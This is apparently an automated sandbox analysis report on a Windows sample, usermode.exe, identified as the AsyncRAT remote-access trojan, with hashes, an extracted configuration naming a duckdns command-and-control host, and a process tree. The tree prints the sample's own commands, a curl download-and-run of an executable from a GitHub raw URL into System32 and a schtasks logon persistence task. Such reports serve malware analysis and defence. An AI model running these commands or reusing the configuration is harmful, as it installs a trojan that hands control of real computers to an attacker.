Analysis
-
max time kernel
140s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
20/06/2024, 04:13
Static task
static1
Behavioral task
behavioral1
Sample
usermode.exe
Resource
win7-20240419-en
General
-
Target
usermode.exe
-
Size
571KB
-
MD5
6ff532b8468ad647aea71708cdf259ff
-
SHA1
8bf56f629e2c32153ba5037bf981dec868f41ce8
-
SHA256
7cbd57fe2ffbaa6da63c865cce81eaf33c083e0b23d69cde51ada9f91f309a99
-
SHA512
4c828064856d29a6530a7b633f4772190ef5d5dd92909ae78610c9319ac9d0f5388e8a15515a824109576d31522d89e06ed88dd1f8e52a8ea058c6e345ea852b
-
SSDEEP
12288:rWYUNQEMuGIbS2McEqE1CMSD9Opbd0xEY8Q3:pUNiufScEf0H9OpqxL
Malware Config
Extracted
asyncrat
1.0.7
Default
hmnms.duckdns.org:2035
gr4g4guhuhuie3hfgggtttu3hf33efffrfrgrgrg3f
-
delay
1
-
install
true
-
install_file
Update.exe
-
install_folder
%AppData%
Signatures
-
Async RAT payload 1 IoCs
resource yara_rule behavioral2/files/0x000a00000002338d-2.dat family_asyncrat -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation boot_cnfg_x32.exe -
Executes dropped EXE 2 IoCs
pid Process 4500 boot_cnfg_x32.exe 4576 Update.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 5 raw.githubusercontent.com 2 raw.githubusercontent.com -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\System32\boot_cnfg_x32.exe curl.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
pid Process 944 timeout.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4472 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 24 IoCs
pid Process 4500 boot_cnfg_x32.exe 4500 boot_cnfg_x32.exe 4500 boot_cnfg_x32.exe 4500 boot_cnfg_x32.exe 4500 boot_cnfg_x32.exe 4500 boot_cnfg_x32.exe 4500 boot_cnfg_x32.exe 4500 boot_cnfg_x32.exe 4500 boot_cnfg_x32.exe 4500 boot_cnfg_x32.exe 4500 boot_cnfg_x32.exe 4500 boot_cnfg_x32.exe 4500 boot_cnfg_x32.exe 4500 boot_cnfg_x32.exe 4500 boot_cnfg_x32.exe 4500 boot_cnfg_x32.exe 4500 boot_cnfg_x32.exe 4500 boot_cnfg_x32.exe 4500 boot_cnfg_x32.exe 4500 boot_cnfg_x32.exe 4500 boot_cnfg_x32.exe 4500 boot_cnfg_x32.exe 4500 boot_cnfg_x32.exe 4500 boot_cnfg_x32.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4500 boot_cnfg_x32.exe Token: SeDebugPrivilege 4576 Update.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 856 wrote to memory of 4016 856 usermode.exe 91 PID 856 wrote to memory of 4016 856 usermode.exe 91 PID 4016 wrote to memory of 4412 4016 cmd.exe 92 PID 4016 wrote to memory of 4412 4016 cmd.exe 92 PID 4016 wrote to memory of 4500 4016 cmd.exe 96 PID 4016 wrote to memory of 4500 4016 cmd.exe 96 PID 4500 wrote to memory of 2716 4500 boot_cnfg_x32.exe 99 PID 4500 wrote to memory of 2716 4500 boot_cnfg_x32.exe 99 PID 4500 wrote to memory of 4560 4500 boot_cnfg_x32.exe 101 PID 4500 wrote to memory of 4560 4500 boot_cnfg_x32.exe 101 PID 2716 wrote to memory of 4472 2716 cmd.exe 103 PID 2716 wrote to memory of 4472 2716 cmd.exe 103 PID 856 wrote to memory of 884 856 usermode.exe 104 PID 856 wrote to memory of 884 856 usermode.exe 104 PID 4560 wrote to memory of 944 4560 cmd.exe 105 PID 4560 wrote to memory of 944 4560 cmd.exe 105 PID 884 wrote to memory of 5008 884 cmd.exe 106 PID 884 wrote to memory of 5008 884 cmd.exe 106 PID 884 wrote to memory of 1224 884 cmd.exe 107 PID 884 wrote to memory of 1224 884 cmd.exe 107 PID 884 wrote to memory of 3536 884 cmd.exe 108 PID 884 wrote to memory of 3536 884 cmd.exe 108 PID 4560 wrote to memory of 4576 4560 cmd.exe 111 PID 4560 wrote to memory of 4576 4560 cmd.exe 111 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\usermode.exe"C:\Users\Admin\AppData\Local\Temp\usermode.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:856 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl https://raw.githubusercontent.com/SkarSys/SkarCrypter/main/SkarCrxpter/obj/kdmapper_release.exe --output C:\\Windows\\System32\\boot_cnfg_x32.exe >nul 2>&1 && C:\\Windows\\System32\\boot_cnfg_x32.exe2⤵
- Suspicious use of WriteProcessMemory
PID:4016 -
C:\Windows\system32\curl.execurl https://raw.githubusercontent.com/SkarSys/SkarCrypter/main/SkarCrxpter/obj/kdmapper_release.exe --output C:\\Windows\\System32\\boot_cnfg_x32.exe3⤵
- Drops file in System32 directory
PID:4412
-
-
C:\Windows\System32\boot_cnfg_x32.exeC:\\Windows\\System32\\boot_cnfg_x32.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4500 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Update" /tr '"C:\Users\Admin\AppData\Roaming\Update.exe"' & exit4⤵
- Suspicious use of WriteProcessMemory
PID:2716 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Update" /tr '"C:\Users\Admin\AppData\Roaming\Update.exe"'5⤵
- Scheduled Task/Job: Scheduled Task
PID:4472
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE62A.tmp.bat""4⤵
- Suspicious use of WriteProcessMemory
PID:4560 -
C:\Windows\system32\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
PID:944
-
-
C:\Users\Admin\AppData\Roaming\Update.exe"C:\Users\Admin\AppData\Roaming\Update.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4576
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\usermode.exe" MD5 | find /i /v "md5" | find /i /v "certutil"2⤵
- Suspicious use of WriteProcessMemory
PID:884 -
C:\Windows\system32\certutil.execertutil -hashfile "C:\Users\Admin\AppData\Local\Temp\usermode.exe" MD53⤵PID:5008
-
-
C:\Windows\system32\find.exefind /i /v "md5"3⤵PID:1224
-
-
C:\Windows\system32\find.exefind /i /v "certutil"3⤵PID:3536
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4352,i,16856304285138459032,14480077487839828721,262144 --variations-seed-version --mojo-platform-channel-handle=4084 /prefetch:81⤵PID:2636
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
150B
MD52c8bc37b47cf08664a78ebbffd76d23b
SHA149e2f3d19a7b9edd662b9763ae47629496ca4758
SHA2568a0da6a175df4c5ab306e7a27093f37aa60ef6f86f5e50d2b5c49fe991fad73a
SHA512b81d18a37f816146daf286018ae6eea6ef888abb817d3db62d0552b7214494c5d2fd9a352176c84811a04581e3660da5c17a48aed696cd8feaaf0ee32f179648
-
Filesize
48KB
MD58f601efcbf3eb183bbd6500296b9ccd2
SHA12542d3fe0e97fa969c0ef8e86676ba1c72e6e846
SHA2565e4a8ebbeb1b7288087c65c0f5edf6d6016528f2bf5104cfc7fd5b315bf1affd
SHA512d101aa1cc4281e29813aaa269b26d9e500a0ee042024273a636fc06d59d4af30d04d1670a58e54d3263cb6dfe9b67c71ef58c4175628841f2c8719260f548d08